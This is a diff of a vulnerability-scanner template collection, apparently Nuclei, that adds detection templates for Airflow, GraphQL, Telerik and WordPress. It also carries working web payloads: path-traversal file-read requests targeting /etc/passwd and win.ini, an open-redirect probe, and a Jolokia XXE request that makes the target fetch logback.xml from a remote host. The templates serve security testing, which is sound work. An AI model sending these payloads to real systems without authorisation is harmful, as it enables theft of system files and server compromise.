tags: tech,apache,airflow
requests:
- method: GET
path:
- "{{BaseURL}}/{{randstr}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Airflow 404 = lots of circles"
- type: status
status:
- 404

7
technologies/graphql.yaml → technologies/graphql-detect.yaml
View File

@ -1,7 +1,7 @@
id: graphql
id: graphql-detect
info:
name: GraphQL API
name: GraphQL API Detection
author: NkxxkN & ELSFA7110
severity: info
@ -51,6 +51,7 @@ requests:
headers:
Content-Type: application/json
body: '{"query":"query IntrospectionQuery{__schema {queryType { name }}}"}'
matchers-condition: and
@ -58,8 +59,10 @@ requests:
- type: status
status:
- 200
- type: regex
regex:
- "__schema"
- "(Introspection|INTROSPECTION|introspection).*?"
- ".*?operation not found.*?"
condition: or

27
technologies/telerik-dialoghandler-detect.yaml
View File

@ -4,17 +4,30 @@ info:
name: Detect Telerik Web UI Dialog Handler
author: organiccrap & zhenwarx
severity: info
reference: https://captmeelo.com/pentest/2018/08/03/pwning-with-telerik.html
reference: |
- https://captmeelo.com/pentest/2018/08/03/pwning-with-telerik.html
- https://github.com/bao7uo/dp_crypto
tags: telerik,asp
requests:
- method: GET
path:
- '{{BaseURL}}/Telerik.Web.UI.DialogHandler.aspx'
- '{{BaseURL}}/DesktopModules/Admin/RadEditorProvider/telerik.web.ui.dialoghandler.aspx'
- '{{BaseURL}}/providers/htmleditorproviders/telerik/telerik.web.ui.dialoghandler.aspx'
- '{{BaseURL}}/desktopmodules/telerikwebui/radeditorprovider/telerik.web.ui.dialoghandler.aspx'
- '{{BaseURL}}/desktopmodules/dnnwerk.radeditorprovider/dialoghandler.aspx'
- '{{BaseURL}}/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '{{BaseURL}}/desktopmodules/telerikwebui/radeditorprovider/telerik.web.ui.dialoghandler.aspx?dp=1'
- '{{BaseURL}}/desktopmodules/dnnwerk.radeditorprovider/dialoghandler.aspx?dp=1'
- '{{BaseURL}}/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx?dp=1'
- '{{BaseURL}}/DesktopModule/UIQuestionControls/UIAskQuestion/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '{{BaseURL}}/Modules/CMS/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '{{BaseURL}}/Admin/ServerSide/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '{{BaseURL}}/DesktopModules/TNComments/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '{{BaseURL}}/Providers/HtmlEditorProviders/Telerik/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '{{BaseURL}}/App_Master/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '{{BaseURL}}/common/admin/PhotoGallery2/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '{{BaseURL}}/common/admin/Jobs2/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '{{BaseURL}}/AsiCommon/Controls/ContentManagement/ContentDesigner/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '{{BaseURL}}/common/admin/Calendar/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '{{BaseURL}}/cms/portlets/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '{{BaseURL}}/dashboard/UserControl/CMS/Page/Telerik.Web.UI.DialogHandler.aspx/Desktopmodules/Admin/dnnWerk.Users/DialogHandler.aspx?dp=1'
matchers-condition: and
matchers:
@ -23,4 +36,4 @@ requests:
- 200
- type: word
words:
- Loading the dialog...
- 'Invalid length for a Base-64 char array'

24
vulnerabilities/other/blue-ocean-excellence-lfi.yaml Normal file
View File

@ -0,0 +1,24 @@
id: blue-ocean-excellence-lfi
info:
name: Blue Ocean Excellence LFI
author: pikpikcu
severity: high
reference: https://blog.csdn.net/qq_41901122/article/details/116786883
tags: blue-ocean,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/download.php?file=../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "toor:[x*]:0:0"
- type: status
status:
- 200

43
vulnerabilities/other/hjtcloud-arbitrary-file-read.yaml Normal file
View File

@ -0,0 +1,43 @@
id: hjtcloud-arbitrary-file-read
info:
name: HJTcloud Arbitrary File Read
author: pikpikcu
severity: high
reference: https://mp.weixin.qq.com/s/w2pkj5ADN7b5uxe-wmfGbw
tags: hjtcloud,lfi
requests:
- raw:
- |
POST /fileDownload?action=downloadBackupFile HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 20
fullPath=/etc/passwd
- |
POST /fileDownload?action=downloadBackupFile HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 20
fullPath=/Windows/win.ini
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
- "bit app support"
condition: or
- type: status
status:
- 200

34
vulnerabilities/other/hjtcloud-rest-arbitrary-file-read.yaml Normal file
View File

@ -0,0 +1,34 @@
id: hjtcloud-rest-arbitrary-file-read
info:
name: HJTcloud Arbitrary file read
author: pikpikcu
severity: low
reference: https://mp.weixin.qq.com/s/w2pkj5ADN7b5uxe-wmfGbw
tags: hjtcloud,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/him/api/rest/V1.0/system/log/list?filePath=../"
matchers-condition: and
matchers:
- type: word
words:
- '"name":'
- '"length":'
- '"filePath":'
- '"list":'
condition: and
part: body
- type: word
words:
- "application/json"
part: header
- type: status
status:
- 200

27
vulnerabilities/other/interlib-fileread.yaml Normal file
View File

@ -0,0 +1,27 @@
id: interlib-fileread
info:
name: Interlib Fileread
author: pikpikcu
severity: high
reference: https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E5%9B%BE%E5%88%9B%E8%BD%AF%E4%BB%B6/%E5%9B%BE%E5%88%9B%E8%BD%AF%E4%BB%B6%20%E5%9B%BE%E4%B9%A6%E9%A6%86%E7%AB%99%E7%BE%A4%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
tags: interlib,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/interlib/report/ShowImage?localPath=etc/passwd"
- "{{BaseURL}}/interlib/report/ShowImage?localPath=C:\\Windows\\system.ini"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- "for 16-bit app support"
condition: or
- type: status
status:
- 200

1
vulnerabilities/other/kafdrop-xss.yaml
View File

@ -5,6 +5,7 @@ info:
author: dhiyaneshDk
severity: medium
tags: kafdrop,xss
description: A vulnerability in KafDrop allows remote unauthenticated attackers to inject arbitrary HTML and/or Javascript into the response returned by the server.
reference: https://github.com/HomeAdvisor/Kafdrop/issues/12
requests:

23
vulnerabilities/other/ns-asg-file-read.yaml Normal file
View File

@ -0,0 +1,23 @@
id: nsasg-arbitrary-file-read
info:
name: NS ASG Arbitrary File Read
author: pikpikcu
severity: high
tags: nsasg,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/admin/cert_download.php?file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

20
vulnerabilities/other/odoo-cms-redirect.yaml Normal file
View File

@ -0,0 +1,20 @@
id: odoo-cms-redirect
info:
name: Odoo CMS - Open redirection all Version
author: 0x_Akoko
description: Odoo CMS - Open redirection all Version.
reference: https://cxsecurity.com/issue/WLB-2021020143
severity: low
tags: odoo,redirect
requests:
- method: GET
path:
- "{{BaseURL}}/website/lang/en_US?r=https://example.com/"
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
part: header

4
vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml
View File

@ -2,7 +2,7 @@ id: springboot-actuators-jolokia-xxe
info:
name: Spring Boot Actuators (Jolokia) XXE
author: dwisiswant0
author: dwisiswant0 & ipanda
severity: high
description: A vulnerability in Spring Boot Actuators's 'jolokia' endpoint allows remote attackers to preform an XML External Entities attack, include content stored on a remote server as if it was its own - this has the potential to allow the execution of arbitrary code and/or disclosure of sensitive information from the target machine.
reference: |
@ -14,6 +14,8 @@ requests:
- method: GET
path:
- "{{BaseURL}}/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml"
- "{{BaseURL}}/actuator/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/random:915!/logback.xml"
matchers-condition: and
matchers:
- type: status

24
vulnerabilities/wordpress/wordpress-db-repair.yaml Normal file
View File

@ -0,0 +1,24 @@
id: wordpress-db-repair
info:
name: Wordpress DB Repair Exposed
author: _C0wb0y_
severity: low
description: Discover enabled Wordpress repair page.
tags: wordpress,config,fpd
requests:
- method: GET
path:
- "{{BaseURL}}/wp-admin/maint/repair.php"
matchers-condition: and
matchers:
- type: word
words:
- "<title>WordPress"
- type: word
words:
- "define('WP_ALLOW_REPAIR', true);"
negative: true

28
vulnerabilities/wordpress/wp-mailchimp-log-exposure.yaml Normal file
View File

@ -0,0 +1,28 @@
id: wp-mailchimp-log-exposure
info:
name: WordPress Mailchimp 4 Debug Log Exposure
author: aashiq
severity: medium
description: Searches for Mailchimp log exposure by attempting to query the debug log endpoint on wp-content
tags: logs,wordpress,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/uploads/mc4wp-debug.log"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "WARNING: Form"
- type: word
words:
- 'text/plain'
part: header

33
vulnerabilities/wordpress/wp-plugin-statistics-sqli.yaml Normal file
View File

@ -0,0 +1,33 @@
id: wp-plugin-statistics-sqli
info:
name: WordPress Plugin WP Statistics 13.0-.7 - Unauthenticated Time-Based Blind SQL Injection
author: lotusdll
severity: critical
description: The WP Statistic WordPress plugin was affected by an Unauthenticated Time-Based Blind SQL Injection security vulnerability.
reference: |
- https://www.exploit-db.com/exploits/49894
- https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/
- https://github.com/Udyz/WP-Statistics-BlindSQL
tags: wordpress,wp-plugin,unauth,sqli,blind
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/wp-statistics/readme.txt'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "WP Statistics"
part: body
- type: regex
regex:
- 'Stable tag\: [1][3]\.[0].([1]|[2]|[3]|[4]|[5]|[6]|[7])|[1][3]\.[0]$'
part: body

25
vulnerabilities/wordpress/wp-popup-listing.yaml Normal file
View File

@ -0,0 +1,25 @@
id: wordpress-popup-listing
info:
name: WordPress Popup Plugin Directory Listing
author: aashiq
severity: info
description: Searches for sensitive directories present in the wordpress-popup plugin.
tags: wordpress,listing
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wordpress-popup/views/admin/"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "Index of"
- "/wp-content/plugins/wordpress-popup/views/admin"
condition: and

32
vulnerabilities/wordpress/wp-uploads-listing.yaml
View File

@ -1,32 +0,0 @@
id: wp-uploads-listing
info:
name: WordPress Upload Directory Listing Enable
author: yashgoti
severity: info
tags: wordpress
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/uploads/"
- "{{BaseURL}}/wp-content/uploads/2015/"
- "{{BaseURL}}/wp-content/uploads/2016/"
- "{{BaseURL}}/wp-content/uploads/2017/"
- "{{BaseURL}}/wp-content/uploads/2018/"
- "{{BaseURL}}/wp-content/uploads/2019/"
- "{{BaseURL}}/wp-content/uploads/2020/"
- "{{BaseURL}}/wp-content/uploads/2021/"
- "{{BaseURL}}/wp-content/uploads/cfdb7_uploads/"
matchers-condition: and
matchers:
- type: word
words:
- "Directory listing for"
- "Index of /"
- "[To Parent Directory]"
- "Directory: /"
- type: status
status:
- 200

18
workflows/airflow-workflow.yaml Normal file
View File

@ -0,0 +1,18 @@
id: airflow-workflow
info:
name: Apache Airflow Security Checks
author: pdteam
description: A simple workflow that runs all Apache Airflow related nuclei templates on a given target.
tags: workflow
workflows:
- template: technologies/airflow-detect.yaml
subtemplates:
- template: cves/2020/CVE-2020-11978.yaml
- template: cves/2020/CVE-2020-13927.yaml
- template: exposed-panels/airflow-panel.yaml
- template: exposures/configs/airflow-configuration-exposure.yaml
- template: default-logins/apache/airflow-default-credentials.yaml
- template: misconfiguration/airflow/

4
workflows/ruijie-workflow.yaml
View File

@ -6,9 +6,9 @@ info:
description: A simple workflow that runs all Ruijie related nuclei templates on a given target.
workflows:
- template: default-logins/smartweb/ruijie-smartweb-default-password.yaml
- template: cnvd/CNVD-2021-17369.yaml
- template: vulnerabilities/other/ruijie-networks-lfi.yaml
- template: vulnerabilities/other/ruijie-networks-rce.yaml
- template: exposures/configs/ruijie-information-disclosure.yaml
- template: exposures/configs/ruijie-smartweb-disclosure.yaml
- template: cnvd/CNVD-2020-56167.yaml
- template: exposures/configs/ruijie-phpinfo.yaml

1
workflows/wordpress-workflow.yaml
View File

@ -32,4 +32,5 @@ workflows:
- template: cves/2020/CVE-2020-35489.yaml
- template: cves/2021/CVE-2021-24146.yaml
- template: cves/2021/CVE-2021-24176.yaml
- template: cves/2021/CVE-2021-24316.yaml
- template: vulnerabilities/wordpress/